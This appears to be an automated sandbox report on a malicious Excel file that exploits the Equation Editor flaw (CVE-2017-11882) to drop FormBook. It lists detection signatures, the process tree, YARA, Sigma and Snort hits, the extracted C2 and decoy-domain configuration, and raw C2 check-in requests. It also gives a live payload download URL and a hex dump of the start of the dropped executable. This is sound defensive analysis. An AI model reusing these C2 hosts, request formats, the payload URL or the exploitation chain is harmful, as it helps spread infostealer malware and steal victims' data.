Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ORDER CONFIRMATION.xlsx

Overview

General Information

Sample Name:ORDER CONFIRMATION.xlsx
Analysis ID:483668
MD5:e1e18c326feb4aea3a983f390e0e36c2
SHA1:7d0abdd1c61dac8dfb411fde050381149fa1aaff
SHA256:a53f9cefce2fc02da9726d54387b05952a3956b9da65c6927c96250b44099d9a
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2808 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2976 cmdline: 'C:\Users\Public\vbc.exe' MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 836 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
      • vbc.exe (PID: 2636 cmdline: C:\Users\Public\vbc.exe MD5: 989933E361010648C467C6D7B6C2D812)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • ipconfig.exe (PID: 1012 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
          • cmd.exe (PID: 2688 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hanlansmojitovillage.net/nthe/"], "decoy": ["omelhorcurso-online.com", "ttjk020.com", "urfavvpimp.com", "touchmytag.com", "allianzbersamamu.com", "menucoders.com", "goldmig.com", "optplm.com", "ramblersattic.com", "thehendrixcollection.com", "angelsmoonsexshop.com", "indianajones.club", "tageslinsen.info", "thscore2.com", "onpar-golf.com", "youcanaskmeto.review", "overseaexpert.com", "1977991.com", "eurolajd.com", "thefoxshack.com", "bubblelized.com", "texasvoterregistration.com", "denme.net", "sprtnet.com", "aedenpure.com", "yourdoor.pro", "oakridge-pm.com", "swoldiersnation.com", "com-security.center", "prostockbeisbol.com", "mailbroadcastdelivery.club", "fihglobal.com", "hiphopventuresllc.com", "ambrieclothing.com", "colorfulcreativeco.com", "mysahuarita.com", "gibadugi.com", "asoboawa.com", "requotation.com", "wolford.mobi", "ndfvkwnew.icu", "thaysay.net", "thaibinhgear.com", "minhscribe.com", "americanstonesusa.com", "dindigulvysya.com", "tomrings.com", "plasticplank.com", "societegenerol.com", "jrufexsh.com", "ujulus.club", "cpb.site", "bhfhf.com", "yamano-ue.com", "vivorelle.com", "groundedheavens.com", "realstyleworks.com", "vicdux.world", "kegeratorcollective.com", "gamemavn.com", "authorjameswshepherdonline.com", "kankanlol.com", "renatradingbv.com", "ponnyridning.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.212.143, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2808, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2808, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2976

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hanlansmojitovillage.net/nthe/"], "decoy": ["omelhorcurso-online.com", "ttjk020.com", "urfavvpimp.com", "touchmytag.com", "allianzbersamamu.com", "menucoders.com", "goldmig.com", "optplm.com", "ramblersattic.com", "thehendrixcollection.com", "angelsmoonsexshop.com", "indianajones.club", "tageslinsen.info", "thscore2.com", "onpar-golf.com", "youcanaskmeto.review", "overseaexpert.com", "1977991.com", "eurolajd.com", "thefoxshack.com", "bubblelized.com", "texasvoterregistration.com", "denme.net", "sprtnet.com", "aedenpure.com", "yourdoor.pro", "oakridge-pm.com", "swoldiersnation.com", "com-security.center", "prostockbeisbol.com", "mailbroadcastdelivery.club", "fihglobal.com", "hiphopventuresllc.com", "ambrieclothing.com", "colorfulcreativeco.com", "mysahuarita.com", "gibadugi.com", "asoboawa.com", "requotation.com", "wolford.mobi", "ndfvkwnew.icu", "thaysay.net", "thaibinhgear.com", "minhscribe.com", "americanstonesusa.com", "dindigulvysya.com", "tomrings.com", "plasticplank.com", "societegenerol.com", "jrufexsh.com", "ujulus.club", "cpb.site", "bhfhf.com", "yamano-ue.com", "vivorelle.com", "groundedheavens.com", "realstyleworks.com", "vicdux.world", "kegeratorcollective.com", "gamemavn.com", "authorjameswshepherdonline.com", "kankanlol.com", "renatradingbv.com", "ponnyridning.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: ORDER CONFIRMATION.xlsxVirustotal: Detection: 32%Perma Link
      Source: ORDER CONFIRMATION.xlsxReversingLabs: Detection: 29%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
      Antivirus detection for URL or domainShow sources
      Source: http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5PAvira URL Cloud: Label: malware
      Source: http://198.23.212.143/ddr/vbc.exeAvira URL Cloud: Label: malware
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
      Source: 8.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: ipconfig.pdb source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000008.00000002.540860003.0000000000030000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
      Source: global trafficDNS query: name: www.americanstonesusa.com
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.212.143:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.212.143:80
      Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49185 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49186 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49188 -> 184.168.131.241:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49195 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49197 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49200 -> 34.98.99.30:80
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.americanstonesusa.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.realstyleworks.com
      Source: C:\Windows\explorer.exeDomain query: www.plasticplank.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.99.131.252 80Jump to behavior
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.hanlansmojitovillage.net/nthe/
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1Host: www.authorjameswshepherdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1Host: www.hanlansmojitovillage.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.thaysay.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.onpar-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1Host: www.americanstonesusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1Host: www.plasticplank.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1Host: www.realstyleworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 16:16:33 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Wed, 15 Sep 2021 03:32:23 GMTETag: "87e00-5cc0058a7b386"Accept-Ranges: bytesContent-Length: 556544Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 36 cf 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 08 00 00 08 00 00 00 00 00 00 ca 93 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 93 08 00 4f 00 00 00 00 a0 08 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 5c 93 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 73 08 00 00 20 00 00 00 74 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 a0 08 00 00 06 00 00 00 76 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 7c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 93 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 04 5f 01 00 03 00 00 00 6f 00 00 06 94 9e 01 00 c8 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 